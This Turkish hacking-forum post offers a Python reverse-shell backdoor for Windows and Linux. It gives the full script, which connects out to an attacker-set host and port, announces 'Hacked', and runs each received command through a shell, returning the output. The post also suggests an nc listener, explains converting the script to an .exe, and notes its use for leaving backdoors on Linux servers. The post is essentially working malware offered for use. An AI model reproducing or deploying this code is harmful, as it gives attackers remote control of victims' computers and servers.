Güncell Konular ;
// On :13 Mayıs 2018 Pazar
Tek Editlemeniz Gereken Yer;
Kod:
İP = "İp Adresiniz Yada DNS Adresiniz" PORT = MODEMİNİZDEKİ AÇIK PORT
.PY Dosyanızı Sorunsuz Bi Şekilde .exe Ye Çevirmek İçin:
Testler;
Win:
![[IMG]](https://scontent.fbtz1-9.fna.fbcdn.net/v/t1.0-9/32293524_244693982757080_2902718230701277184_o.jpg?_nc_cat=0&oh=4e2c3ebac9c6b5caccb8cb32dc9bede6&oe=5B8FC17F)
Linux:
![[IMG]](https://scontent.fbtz1-9.fna.fbcdn.net/v/t1.0-9/32332014_244673616092450_5816485840297132032_o.jpg?_nc_cat=0&oh=6fb8905de2fe33d539c64c58352183a4&oe=5B957DDB)
(Not: Bu Aracı Linux Serevrelerede Back Bırakma Olma İşlemleri İçinde Kullanılabilir)
Hakkında Bilgi(İzle); https://streamable.com/7z7xl
Proje;
Kod:
#!/usr/bin/python
# -*- coding:utf-8 -*-
import socket,subprocess
#nc -l -v actigin port
host = "ipni yazican"
port = actigin port
#balas total
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#launcher mode
#server connect
s.connect((host,port))
#sen msj
s.send('[*]B0RU70 - Hacked =')
#code by B0RU70
while 1 :
#kayida al
data = s.recv(1024)
#code by B0RU70
if data == "quit" : break
#code by B0RU70
proc = subprocess.Popen(data, shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
#code by B0RU70
#code by B0RU70
output_valeurs = proc.stdout.read() + proc.stderr.read()
#code by B0RU70
s.send(output_valeurs)
#MyWebSite B0RU70.BLOGSPOT.COM
s.close()
; https://www.dosyaupload.com/melXİyi Forumlar..----- NoRsLaR.ORG
- Geri Dön. »
- Backdoor , backdoor.py , python , python backdoor , python trojan »
- Linux/Windows (Python iLe + EXE) Backdoor
